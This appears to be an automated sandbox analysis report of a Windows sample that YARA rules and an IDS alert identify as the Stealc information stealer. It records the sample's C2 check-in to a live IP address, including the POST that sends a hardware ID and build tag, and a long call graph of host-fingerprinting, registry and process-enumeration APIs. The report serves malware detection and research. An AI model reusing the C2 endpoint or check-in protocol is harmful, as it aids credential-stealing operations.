kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-24T12:11:08.098877+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.6 | 49711 | 185.215.113.37 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 24, 2024 12:11:06.873512983 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
Oct 24, 2024 12:11:06.878959894 CEST | 80 | 49711 | 185.215.113.37 | 192.168.2.6
Oct 24, 2024 12:11:06.879066944 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
Oct 24, 2024 12:11:06.879647017 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
Oct 24, 2024 12:11:06.885874033 CEST | 80 | 49711 | 185.215.113.37 | 192.168.2.6
Oct 24, 2024 12:11:07.776592016 CEST | 80 | 49711 | 185.215.113.37 | 192.168.2.6
Oct 24, 2024 12:11:07.776694059 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
Oct 24, 2024 12:11:07.809176922 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
Oct 24, 2024 12:11:07.814810991 CEST | 80 | 49711 | 185.215.113.37 | 192.168.2.6
Oct 24, 2024 12:11:08.095180988 CEST | 80 | 49711 | 185.215.113.37 | 192.168.2.6
Oct 24, 2024 12:11:08.098876953 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
Oct 24, 2024 12:11:10.378079891 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
• 185.215.113.37
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49711 | 185.215.113.37 | 80 | 3884 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 12:11:06.879647017 CEST | 89 | OUT |
GET / HTTP/1.1
Host: 185.215.113.37
Connection: Keep-Alive
Cache-Control: no-cache
Oct 24, 2024 12:11:07.776592016 CEST | 203 | IN |
HTTP/1.1 200 OK
Date: Thu, 24 Oct 2024 10:11:07 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Oct 24, 2024 12:11:07.809176922 CEST | 411 | OUT |
POST /e2b1563c6670f193.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----CAFBGHIDBGHJJKFHJDHC
Host: 185.215.113.37
Content-Length: 210
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 43 41 46 42 47 48 49 44 42 47 48 4a 4a 4b 46 48 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 35 37 32 41 32 38 44 32 36 37 39 34 33 34 30 30 30 36 33 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 42 47 48 49 44 42 47 48 4a 4a 4b 46 48 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 42 47 48 49 44 42 47 48 4a 4a 4b 46 48 4a 44 48 43 2d 2d 0d 0a
Data Ascii: ------CAFBGHIDBGHJJKFHJDHCContent-Disposition: form-data; name="hwid"A0572A28D267943400063------CAFBGHIDBGHJJKFHJDHCContent-Disposition: form-data; name="build"doma------CAFBGHIDBGHJJKFHJDHC--
Oct 24, 2024 12:11:08.095180988 CEST | 210 | IN |
HTTP/1.1 200 OK
Date: Thu, 24 Oct 2024 10:11:07 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s=
(The 8-byte response body "YmxvY2s=" is base64 for the ASCII string "block".)

Target ID: 0
Start time: 06:11:03
Start date: 24/10/2024
Path: C:\Users\user\Desktop\file.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\file.exe"
Imagebase: 0xaf0000
File size: 1'820'160 bytes
MD5 hash: 3232476789303EC2731E9CCCE8937FEA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2140370390.0000000005480000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2182986141.000000000188E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true


Execution Graph

Execution Coverage: 7.8%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 10.1%
Total number of Nodes: 2000
Total number of Limit Nodes: 24
                          execution_graph 13244 b069f0 13289 af2260 13244->13289 13268 b06a64 13269 b0a9b0 4 API calls 13268->13269 13270 b06a6b 13269->13270 13271 b0a9b0 4 API calls 13270->13271 13272 b06a72 13271->13272 13273 b0a9b0 4 API calls 13272->13273 13274 b06a79 13273->13274 13275 b0a9b0 4 API calls 13274->13275 13276 b06a80 13275->13276 13441 b0a8a0 13276->13441 13278 b06b0c 13445 b06920 GetSystemTime 13278->13445 13279 b06a89 13279->13278 13281 b06ac2 OpenEventA 13279->13281 13283 b06af5 CloseHandle Sleep 13281->13283 13284 b06ad9 13281->13284 13286 b06b0a 13283->13286 13288 b06ae1 CreateEventA 13284->13288 13286->13279 13288->13278 13642 af45c0 13289->13642 13291 af2274 13292 af45c0 2 API calls 13291->13292 13293 af228d 13292->13293 13294 af45c0 2 API calls 13293->13294 13295 af22a6 13294->13295 13296 af45c0 2 API calls 13295->13296 13297 af22bf 13296->13297 13298 af45c0 2 API calls 13297->13298 13299 af22d8 13298->13299 13300 af45c0 2 API calls 13299->13300 13301 af22f1 13300->13301 13302 af45c0 2 API calls 13301->13302 13303 af230a 13302->13303 13304 af45c0 2 API calls 13303->13304 13305 af2323 13304->13305 13306 af45c0 2 API calls 13305->13306 13307 af233c 13306->13307 13308 af45c0 2 API calls 13307->13308 13309 af2355 13308->13309 13310 af45c0 2 API calls 13309->13310 13311 af236e 13310->13311 13312 af45c0 2 API calls 13311->13312 13313 af2387 13312->13313 13314 af45c0 2 API calls 13313->13314 13315 af23a0 13314->13315 13316 af45c0 2 API calls 13315->13316 13317 af23b9 13316->13317 13318 af45c0 2 API calls 13317->13318 13319 af23d2 13318->13319 13320 af45c0 2 API calls 13319->13320 13321 af23eb 13320->13321 13322 af45c0 2 API calls 13321->13322 13323 af2404 13322->13323 13324 af45c0 2 API calls 13323->13324 13325 af241d 13324->13325 13326 af45c0 2 API calls 13325->13326 13327 af2436 13326->13327 13328 af45c0 2 API calls 13327->13328 13329 af244f 13328->13329 13330 af45c0 2 API calls 13329->13330 13331 af2468 13330->13331 13332 af45c0 2 API calls 
13331->13332 13333 af2481 13332->13333 13334 af45c0 2 API calls 13333->13334 13335 af249a 13334->13335 13336 af45c0 2 API calls 13335->13336 13337 af24b3 13336->13337 13338 af45c0 2 API calls 13337->13338 13339 af24cc 13338->13339 13340 af45c0 2 API calls 13339->13340 13341 af24e5 13340->13341 13342 af45c0 2 API calls 13341->13342 13343 af24fe 13342->13343 13344 af45c0 2 API calls 13343->13344 13345 af2517 13344->13345 13346 af45c0 2 API calls 13345->13346 13347 af2530 13346->13347 13348 af45c0 2 API calls 13347->13348 13349 af2549 13348->13349 13350 af45c0 2 API calls 13349->13350 13351 af2562 13350->13351 13352 af45c0 2 API calls 13351->13352 13353 af257b 13352->13353 13354 af45c0 2 API calls 13353->13354 13355 af2594 13354->13355 13356 af45c0 2 API calls 13355->13356 13357 af25ad 13356->13357 13358 af45c0 2 API calls 13357->13358 13359 af25c6 13358->13359 13360 af45c0 2 API calls 13359->13360 13361 af25df 13360->13361 13362 af45c0 2 API calls 13361->13362 13363 af25f8 13362->13363 13364 af45c0 2 API calls 13363->13364 13365 af2611 13364->13365 13366 af45c0 2 API calls 13365->13366 13367 af262a 13366->13367 13368 af45c0 2 API calls 13367->13368 13369 af2643 13368->13369 13370 af45c0 2 API calls 13369->13370 13371 af265c 13370->13371 13372 af45c0 2 API calls 13371->13372 13373 af2675 13372->13373 13374 af45c0 2 API calls 13373->13374 13375 af268e 13374->13375 13376 b09860 13375->13376 13647 b09750 GetPEB 13376->13647 13378 b09868 13379 b09a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13378->13379 13380 b0987a 13378->13380 13381 b09af4 GetProcAddress 13379->13381 13382 b09b0d 13379->13382 13383 b0988c 21 API calls 13380->13383 13381->13382 13384 b09b46 13382->13384 13385 b09b16 GetProcAddress GetProcAddress 13382->13385 13383->13379 13386 b09b68 13384->13386 13387 b09b4f GetProcAddress 13384->13387 13385->13384 13388 b09b71 GetProcAddress 13386->13388 13389 b09b89 13386->13389 13387->13386 13388->13389 13390 b06a00 13389->13390 13391 b09b92 
14739->14664 14741 b0a9b0 4 API calls 14741->14743 14742 b0a8a0 lstrcpy 14742->14743 14743->14738 14743->14739 14743->14741 14743->14742 14746 b01077 14744->14746 14745 b01151 14745->13515 14746->14745 14747 b0a820 lstrlen lstrcpy 14746->14747 14747->14746 14750 b00db7 14748->14750 14749 b00f17 14749->13523 14750->14749 14751 b00ea4 StrCmpCA 14750->14751 14752 b00e27 StrCmpCA 14750->14752 14753 b00e67 StrCmpCA 14750->14753 14754 b0a820 lstrlen lstrcpy 14750->14754 14751->14750 14752->14750 14753->14750 14754->14750 14759 b00f67 14755->14759 14756 b01044 14756->13531 14757 b00fb2 StrCmpCA 14757->14759 14758 b0a820 lstrlen lstrcpy 14758->14759 14759->14756 14759->14757 14759->14758 14761 b0a740 lstrcpy 14760->14761 14762 b01a26 14761->14762 14763 b0a9b0 4 API calls 14762->14763 14764 b01a37 14763->14764 14765 b0a8a0 lstrcpy 14764->14765 14766 b01a40 14765->14766 14767 b0a9b0 4 API calls 14766->14767 14768 b01a5b 14767->14768 14769 b0a8a0 lstrcpy 14768->14769 14770 b01a64 14769->14770 14771 b0a9b0 4 API calls 14770->14771 14772 b01a7d 14771->14772 14773 b0a8a0 lstrcpy 14772->14773 14774 b01a86 14773->14774 14775 b0a9b0 4 API calls 14774->14775 14776 b01aa1 14775->14776 14777 b0a8a0 lstrcpy 14776->14777 14778 b01aaa 14777->14778 14779 b0a9b0 4 API calls 14778->14779 14780 b01ac3 14779->14780 14781 b0a8a0 lstrcpy 14780->14781 14782 b01acc 14781->14782 14783 b0a9b0 4 API calls 14782->14783 14784 b01ae7 14783->14784 14785 b0a8a0 lstrcpy 14784->14785 14786 b01af0 14785->14786 14787 b0a9b0 4 API calls 14786->14787 14788 b01b09 14787->14788 14789 b0a8a0 lstrcpy 14788->14789 14790 b01b12 14789->14790 14791 b0a9b0 4 API calls 14790->14791 14792 b01b2d 14791->14792 14793 b0a8a0 lstrcpy 14792->14793 14794 b01b36 14793->14794 14795 b0a9b0 4 API calls 14794->14795 14796 b01b4f 14795->14796 14797 b0a8a0 lstrcpy 14796->14797 14798 b01b58 14797->14798 14799 b0a9b0 4 API calls 14798->14799 14800 b01b76 14799->14800 14801 b0a8a0 lstrcpy 14800->14801 14802 b01b7f 14801->14802 14803 
b07500 6 API calls 14802->14803 14804 b01b96 14803->14804 14805 b0a920 3 API calls 14804->14805 14806 b01ba9 14805->14806 14807 b0a8a0 lstrcpy 14806->14807 14808 b01bb2 14807->14808 14809 b0a9b0 4 API calls 14808->14809 14810 b01bdc 14809->14810 14811 b0a8a0 lstrcpy 14810->14811 14812 b01be5 14811->14812 14813 b0a9b0 4 API calls 14812->14813 14814 b01c05 14813->14814 14815 b0a8a0 lstrcpy 14814->14815 14816 b01c0e 14815->14816 15524 b07690 GetProcessHeap RtlAllocateHeap 14816->15524 14819 b0a9b0 4 API calls 14820 b01c2e 14819->14820 14821 b0a8a0 lstrcpy 14820->14821 14822 b01c37 14821->14822 14823 b0a9b0 4 API calls 14822->14823 14824 b01c56 14823->14824 14825 b0a8a0 lstrcpy 14824->14825 14826 b01c5f 14825->14826 14827 b0a9b0 4 API calls 14826->14827 14828 b01c80 14827->14828 14829 b0a8a0 lstrcpy 14828->14829 14830 b01c89 14829->14830 15531 b077c0 GetCurrentProcess IsWow64Process 14830->15531 14833 b0a9b0 4 API calls 14834 b01ca9 14833->14834 14835 b0a8a0 lstrcpy 14834->14835 14836 b01cb2 14835->14836 14837 b0a9b0 4 API calls 14836->14837 14838 b01cd1 14837->14838 14839 b0a8a0 lstrcpy 14838->14839 14840 b01cda 14839->14840 14841 b0a9b0 4 API calls 14840->14841 14842 b01cfb 14841->14842 14843 b0a8a0 lstrcpy 14842->14843 14844 b01d04 14843->14844 14845 b07850 3 API calls 14844->14845 14846 b01d14 14845->14846 14847 b0a9b0 4 API calls 14846->14847 14848 b01d24 14847->14848 14849 b0a8a0 lstrcpy 14848->14849 14850 b01d2d 14849->14850 14851 b0a9b0 4 API calls 14850->14851 14852 b01d4c 14851->14852 14853 b0a8a0 lstrcpy 14852->14853 14854 b01d55 14853->14854 14855 b0a9b0 4 API calls 14854->14855 14856 b01d75 14855->14856 14857 b0a8a0 lstrcpy 14856->14857 14858 b01d7e 14857->14858 14859 b078e0 3 API calls 14858->14859 14860 b01d8e 14859->14860 14861 b0a9b0 4 API calls 14860->14861 14862 b01d9e 14861->14862 14863 b0a8a0 lstrcpy 14862->14863 14864 b01da7 14863->14864 14865 b0a9b0 4 API calls 14864->14865 14866 b01dc6 14865->14866 14867 b0a8a0 lstrcpy 14866->14867 14868 b01dcf 
14867->14868 14869 b0a9b0 4 API calls 14868->14869 14870 b01df0 14869->14870 14871 b0a8a0 lstrcpy 14870->14871 14872 b01df9 14871->14872 15533 b07980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14872->15533 14875 b0a9b0 4 API calls 14876 b01e19 14875->14876 14877 b0a8a0 lstrcpy 14876->14877 14878 b01e22 14877->14878 14879 b0a9b0 4 API calls 14878->14879 14880 b01e41 14879->14880 14881 b0a8a0 lstrcpy 14880->14881 14882 b01e4a 14881->14882 14883 b0a9b0 4 API calls 14882->14883 14884 b01e6b 14883->14884 14885 b0a8a0 lstrcpy 14884->14885 14886 b01e74 14885->14886 15535 b07a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14886->15535 14889 b0a9b0 4 API calls 14890 b01e94 14889->14890 14891 b0a8a0 lstrcpy 14890->14891 14892 b01e9d 14891->14892 14893 b0a9b0 4 API calls 14892->14893 14894 b01ebc 14893->14894 14895 b0a8a0 lstrcpy 14894->14895 14896 b01ec5 14895->14896 14897 b0a9b0 4 API calls 14896->14897 14898 b01ee5 14897->14898 14899 b0a8a0 lstrcpy 14898->14899 14900 b01eee 14899->14900 15538 b07b00 GetUserDefaultLocaleName 14900->15538 14903 b0a9b0 4 API calls 14904 b01f0e 14903->14904 14905 b0a8a0 lstrcpy 14904->14905 14906 b01f17 14905->14906 14907 b0a9b0 4 API calls 14906->14907 14908 b01f36 14907->14908 14909 b0a8a0 lstrcpy 14908->14909 14910 b01f3f 14909->14910 14911 b0a9b0 4 API calls 14910->14911 14912 b01f60 14911->14912 14913 b0a8a0 lstrcpy 14912->14913 14914 b01f69 14913->14914 15542 b07b90 14914->15542 14916 b01f80 14917 b0a920 3 API calls 14916->14917 14918 b01f93 14917->14918 14919 b0a8a0 lstrcpy 14918->14919 14920 b01f9c 14919->14920 14921 b0a9b0 4 API calls 14920->14921 14922 b01fc6 14921->14922 14923 b0a8a0 lstrcpy 14922->14923 14924 b01fcf 14923->14924 14925 b0a9b0 4 API calls 14924->14925 14926 b01fef 14925->14926 14927 b0a8a0 lstrcpy 14926->14927 14928 b01ff8 14927->14928 15554 b07d80 GetSystemPowerStatus 14928->15554 14931 b0a9b0 4 API calls 14932 b02018 14931->14932 14933 b0a8a0 lstrcpy 14932->14933 14934 b02021 14933->14934 14935 
b0a9b0 4 API calls 14934->14935 14936 b02040 14935->14936 14937 b0a8a0 lstrcpy 14936->14937 14938 b02049 14937->14938 14939 b0a9b0 4 API calls 14938->14939 14940 b0206a 14939->14940 14941 b0a8a0 lstrcpy 14940->14941 14942 b02073 14941->14942 14943 b0207e GetCurrentProcessId 14942->14943 15556 b09470 OpenProcess 14943->15556 14946 b0a920 3 API calls 14947 b020a4 14946->14947 14948 b0a8a0 lstrcpy 14947->14948 14949 b020ad 14948->14949 14950 b0a9b0 4 API calls 14949->14950 14951 b020d7 14950->14951 14952 b0a8a0 lstrcpy 14951->14952 14953 b020e0 14952->14953 14954 b0a9b0 4 API calls 14953->14954 14955 b02100 14954->14955 14956 b0a8a0 lstrcpy 14955->14956 14957 b02109 14956->14957 15561 b07e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14957->15561 14960 b0a9b0 4 API calls 14961 b02129 14960->14961 14962 b0a8a0 lstrcpy 14961->14962 14963 b02132 14962->14963 14964 b0a9b0 4 API calls 14963->14964 14965 b02151 14964->14965 14966 b0a8a0 lstrcpy 14965->14966 14967 b0215a 14966->14967 14968 b0a9b0 4 API calls 14967->14968 14969 b0217b 14968->14969 14970 b0a8a0 lstrcpy 14969->14970 14971 b02184 14970->14971 15565 b07f60 14971->15565 14974 b0a9b0 4 API calls 14975 b021a4 14974->14975 14976 b0a8a0 lstrcpy 14975->14976 14977 b021ad 14976->14977 14978 b0a9b0 4 API calls 14977->14978 14979 b021cc 14978->14979 14980 b0a8a0 lstrcpy 14979->14980 14981 b021d5 14980->14981 14982 b0a9b0 4 API calls 14981->14982 14983 b021f6 14982->14983 14984 b0a8a0 lstrcpy 14983->14984 14985 b021ff 14984->14985 15578 b07ed0 GetSystemInfo wsprintfA 14985->15578 14988 b0a9b0 4 API calls 14989 b0221f 14988->14989 14990 b0a8a0 lstrcpy 14989->14990 14991 b02228 14990->14991 14992 b0a9b0 4 API calls 14991->14992 14993 b02247 14992->14993 14994 b0a8a0 lstrcpy 14993->14994 14995 b02250 14994->14995 14996 b0a9b0 4 API calls 14995->14996 14997 b02270 14996->14997 14998 b0a8a0 lstrcpy 14997->14998 14999 b02279 14998->14999 15580 b08100 GetProcessHeap RtlAllocateHeap 14999->15580 15002 b0a9b0 4 API calls 15003 
b02299 15002->15003 15004 b0a8a0 lstrcpy 15003->15004 15005 b022a2 15004->15005 15006 b0a9b0 4 API calls 15005->15006 15007 b022c1 15006->15007 15008 b0a8a0 lstrcpy 15007->15008 15009 b022ca 15008->15009 15010 b0a9b0 4 API calls 15009->15010 15011 b022eb 15010->15011 15012 b0a8a0 lstrcpy 15011->15012 15013 b022f4 15012->15013 15586 b087c0 15013->15586 15016 b0a920 3 API calls 15017 b0231e 15016->15017 15018 b0a8a0 lstrcpy 15017->15018 15019 b02327 15018->15019 15020 b0a9b0 4 API calls 15019->15020 15021 b02351 15020->15021 15022 b0a8a0 lstrcpy 15021->15022 15023 b0235a 15022->15023 15024 b0a9b0 4 API calls 15023->15024 15025 b0237a 15024->15025 15026 b0a8a0 lstrcpy 15025->15026 15027 b02383 15026->15027 15028 b0a9b0 4 API calls 15027->15028 15029 b023a2 15028->15029 15030 b0a8a0 lstrcpy 15029->15030 15031 b023ab 15030->15031 15591 b081f0 15031->15591 15033 b023c2 15034 b0a920 3 API calls 15033->15034 15035 b023d5 15034->15035 15036 b0a8a0 lstrcpy 15035->15036 15037 b023de 15036->15037 15038 b0a9b0 4 API calls 15037->15038 15039 b0240a 15038->15039 15040 b0a8a0 lstrcpy 15039->15040 15041 b02413 15040->15041 15042 b0a9b0 4 API calls 15041->15042 15043 b02432 15042->15043 15044 b0a8a0 lstrcpy 15043->15044 15045 b0243b 15044->15045 15046 b0a9b0 4 API calls 15045->15046 15047 b0245c 15046->15047 15048 b0a8a0 lstrcpy 15047->15048 15049 b02465 15048->15049 15050 b0a9b0 4 API calls 15049->15050 15051 b02484 15050->15051 15052 b0a8a0 lstrcpy 15051->15052 15053 b0248d 15052->15053 15054 b0a9b0 4 API calls 15053->15054 15055 b024ae 15054->15055 15056 b0a8a0 lstrcpy 15055->15056 15057 b024b7 15056->15057 15599 b08320 15057->15599 15059 b024d3 15060 b0a920 3 API calls 15059->15060 15061 b024e6 15060->15061 15062 b0a8a0 lstrcpy 15061->15062 15063 b024ef 15062->15063 15064 b0a9b0 4 API calls 15063->15064 15065 b02519 15064->15065 15066 b0a8a0 lstrcpy 15065->15066 15067 b02522 15066->15067 15068 b0a9b0 4 API calls 15067->15068 15069 b02543 15068->15069 15070 b0a8a0 lstrcpy 
15069->15070 15071 b0254c 15070->15071 15072 b08320 17 API calls 15071->15072 15073 b02568 15072->15073 15074 b0a920 3 API calls 15073->15074 15075 b0257b 15074->15075 15076 b0a8a0 lstrcpy 15075->15076 15077 b02584 15076->15077 15078 b0a9b0 4 API calls 15077->15078 15079 b025ae 15078->15079 15080 b0a8a0 lstrcpy 15079->15080 15081 b025b7 15080->15081 15082 b0a9b0 4 API calls 15081->15082 15083 b025d6 15082->15083 15084 b0a8a0 lstrcpy 15083->15084 15085 b025df 15084->15085 15086 b0a9b0 4 API calls 15085->15086 15087 b02600 15086->15087 15088 b0a8a0 lstrcpy 15087->15088 15089 b02609 15088->15089 15635 b08680 15089->15635 15091 b02620 15092 b0a920 3 API calls 15091->15092 15093 b02633 15092->15093 15094 b0a8a0 lstrcpy 15093->15094 15095 b0263c 15094->15095 15096 b0265a lstrlen 15095->15096 15097 b0266a 15096->15097 15098 b0a740 lstrcpy 15097->15098 15099 b0267c 15098->15099 15100 af1590 lstrcpy 15099->15100 15101 b0268d 15100->15101 15645 b05190 15101->15645 15103 b02699 15103->13535 15833 b0aad0 15104->15833 15106 af5009 InternetOpenUrlA 15110 af5021 15106->15110 15107 af502a InternetReadFile 15107->15110 15108 af50a0 InternetCloseHandle InternetCloseHandle 15109 af50ec 15108->15109 15109->13539 15110->15107 15110->15108 15834 af98d0 15111->15834 15113 b00759 15114 b00a38 15113->15114 15115 b0077d 15113->15115 15116 af1590 lstrcpy 15114->15116 15117 b00799 StrCmpCA 15115->15117 15118 b00a49 15116->15118 15119 b007a8 15117->15119 15148 b00843 15117->15148 16010 b00250 15118->16010 15121 b0a7a0 lstrcpy 15119->15121 15122 b007c3 15121->15122 15125 af1590 lstrcpy 15122->15125 15123 b00865 StrCmpCA 15124 b00874 15123->15124 15129 b0096b 15123->15129 15127 b0a740 lstrcpy 15124->15127 15128 b0080c 15125->15128 15131 b00881 15127->15131 15132 b0a7a0 lstrcpy 15128->15132 15130 b0099c StrCmpCA 15129->15130 15133 b00a2d 15130->15133 15134 b009ab 15130->15134 15135 b0a9b0 4 API calls 15131->15135 15136 b00823 15132->15136 15133->13543 15137 af1590 lstrcpy 15134->15137 15138 
b008ac 15135->15138 15139 b0a7a0 lstrcpy 15136->15139 15140 b009f4 15137->15140 15141 b0a920 3 API calls 15138->15141 15142 b0083e 15139->15142 15143 b0a7a0 lstrcpy 15140->15143 15144 b008b3 15141->15144 15837 affb00 15142->15837 15146 b00a0d 15143->15146 15147 b0a9b0 4 API calls 15144->15147 15149 b0a7a0 lstrcpy 15146->15149 15150 b008ba 15147->15150 15148->15123 15151 b00a28 15149->15151 15485 b0a7a0 lstrcpy 15484->15485 15486 af1683 15485->15486 15487 b0a7a0 lstrcpy 15486->15487 15488 af1695 15487->15488 15489 b0a7a0 lstrcpy 15488->15489 15490 af16a7 15489->15490 15491 b0a7a0 lstrcpy 15490->15491 15492 af15a3 15491->15492 15492->14366 15494 af47c6 15493->15494 15495 af4838 lstrlen 15494->15495 15519 b0aad0 15495->15519 15497 af4848 InternetCrackUrlA 15498 af4867 15497->15498 15498->14443 15500 b0a740 lstrcpy 15499->15500 15501 b08b74 15500->15501 15502 b0a740 lstrcpy 15501->15502 15503 b08b82 GetSystemTime 15502->15503 15504 b08b99 15503->15504 15505 b0a7a0 lstrcpy 15504->15505 15506 b08bfc 15505->15506 15506->14458 15508 b0a931 15507->15508 15509 b0a988 15508->15509 15511 b0a968 lstrcpy lstrcat 15508->15511 15510 b0a7a0 lstrcpy 15509->15510 15512 b0a994 15510->15512 15511->15509 15512->14461 15513->14576 15515 af4eee 15514->15515 15516 af9af9 LocalAlloc 15514->15516 15515->14464 15515->14466 15516->15515 15517 af9b14 CryptStringToBinaryA 15516->15517 15517->15515 15518 af9b39 LocalFree 15517->15518 15518->15515 15519->15497 15520->14586 15521->14727 15522->14729 15523->14737 15652 b077a0 15524->15652 15527 b076c6 RegOpenKeyExA 15529 b07704 RegCloseKey 15527->15529 15530 b076e7 RegQueryValueExA 15527->15530 15528 b01c1e 15528->14819 15529->15528 15530->15529 15532 b01c99 15531->15532 15532->14833 15534 b01e09 15533->15534 15534->14875 15536 b07a9a wsprintfA 15535->15536 15537 b01e84 15535->15537 15536->15537 15537->14889 15539 b01efe 15538->15539 15540 b07b4d 15538->15540 15539->14903 15659 b08d20 LocalAlloc CharToOemW 15540->15659 15543 b0a740 lstrcpy 
15542->15543 15544 b07bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15543->15544 15552 b07c25 15544->15552 15545 b07c46 GetLocaleInfoA 15545->15552 15546 b07d18 15547 b07d28 15546->15547 15548 b07d1e LocalFree 15546->15548 15549 b0a7a0 lstrcpy 15547->15549 15548->15547 15553 b07d37 15549->15553 15550 b0a9b0 lstrcpy lstrlen lstrcpy lstrcat 15550->15552 15551 b0a8a0 lstrcpy 15551->15552 15552->15545 15552->15546 15552->15550 15552->15551 15553->14916 15555 b02008 15554->15555 15555->14931 15557 b09493 GetModuleFileNameExA CloseHandle 15556->15557 15558 b094b5 15556->15558 15557->15558 15559 b0a740 lstrcpy 15558->15559 15560 b02091 15559->15560 15560->14946 15562 b02119 15561->15562 15563 b07e68 RegQueryValueExA 15561->15563 15562->14960 15564 b07e8e RegCloseKey 15563->15564 15564->15562 15566 b07fb9 GetLogicalProcessorInformationEx 15565->15566 15567 b07fd8 GetLastError 15566->15567 15568 b08029 15566->15568 15572 b08022 15567->15572 15577 b07fe3 15567->15577 15573 b089f0 2 API calls 15568->15573 15571 b02194 15571->14974 15572->15571 15574 b089f0 2 API calls 15572->15574 15575 b0807b 15573->15575 15574->15571 15575->15572 15576 b08084 wsprintfA 15575->15576 15576->15571 15577->15566 15577->15571 15660 b089f0 15577->15660 15663 b08a10 GetProcessHeap RtlAllocateHeap 15577->15663 15579 b0220f 15578->15579 15579->14988 15581 b089b0 15580->15581 15582 b0814d GlobalMemoryStatusEx 15581->15582 15585 b08163 15582->15585 15583 b0819b wsprintfA 15584 b02289 15583->15584 15584->15002 15585->15583 15587 b087fb GetProcessHeap RtlAllocateHeap wsprintfA 15586->15587 15589 b0a740 lstrcpy 15587->15589 15590 b0230b 15589->15590 15590->15016 15592 b0a740 lstrcpy 15591->15592 15596 b08229 15592->15596 15593 b08263 15595 b0a7a0 lstrcpy 15593->15595 15594 b0a9b0 lstrcpy lstrlen lstrcpy lstrcat 15594->15596 15597 b082dc 15595->15597 15596->15593 15596->15594 15598 b0a8a0 lstrcpy 15596->15598 15597->15033 15598->15596 15600 b0a740 lstrcpy 15599->15600 15601 b0835c 
RegOpenKeyExA 15600->15601 15602 b083d0 15601->15602 15603 b083ae 15601->15603 15605 b08613 RegCloseKey 15602->15605 15606 b083f8 RegEnumKeyExA 15602->15606 15604 b0a7a0 lstrcpy 15603->15604 15615 b083bd 15604->15615 15607 b0a7a0 lstrcpy 15605->15607 15608 b0860e 15606->15608 15609 b0843f wsprintfA RegOpenKeyExA 15606->15609 15607->15615 15608->15605 15610 b084c1 RegQueryValueExA 15609->15610 15611 b08485 RegCloseKey RegCloseKey 15609->15611 15613 b08601 RegCloseKey 15610->15613 15614 b084fa lstrlen 15610->15614 15612 b0a7a0 lstrcpy 15611->15612 15612->15615 15613->15608 15614->15613 15616 b08510 15614->15616 15615->15059 15617 b0a9b0 4 API calls 15616->15617 15618 b08527 15617->15618 15619 b0a8a0 lstrcpy 15618->15619 15620 b08533 15619->15620 15621 b0a9b0 4 API calls 15620->15621 15622 b08557 15621->15622 15623 b0a8a0 lstrcpy 15622->15623 15624 b08563 15623->15624 15625 b0856e RegQueryValueExA 15624->15625 15625->15613 15626 b085a3 15625->15626 15627 b0a9b0 4 API calls 15626->15627 15628 b085ba 15627->15628 15629 b0a8a0 lstrcpy 15628->15629 15630 b085c6 15629->15630 15631 b0a9b0 4 API calls 15630->15631 15632 b085ea 15631->15632 15633 b0a8a0 lstrcpy 15632->15633 15634 b085f6 15633->15634 15634->15613 15636 b0a740 lstrcpy 15635->15636 15637 b086bc CreateToolhelp32Snapshot Process32First 15636->15637 15638 b086e8 Process32Next 15637->15638 15639 b0875d CloseHandle 15637->15639 15638->15639 15644 b086fd 15638->15644 15640 b0a7a0 lstrcpy 15639->15640 15642 b08776 15640->15642 15641 b0a8a0 lstrcpy 15641->15644 15642->15091 15643 b0a9b0 lstrcpy lstrlen lstrcpy lstrcat 15643->15644 15644->15638 15644->15641 15644->15643 15646 b0a7a0 lstrcpy 15645->15646 15647 b051b5 15646->15647 15648 af1590 lstrcpy 15647->15648 15649 b051c6 15648->15649 15664 af5100 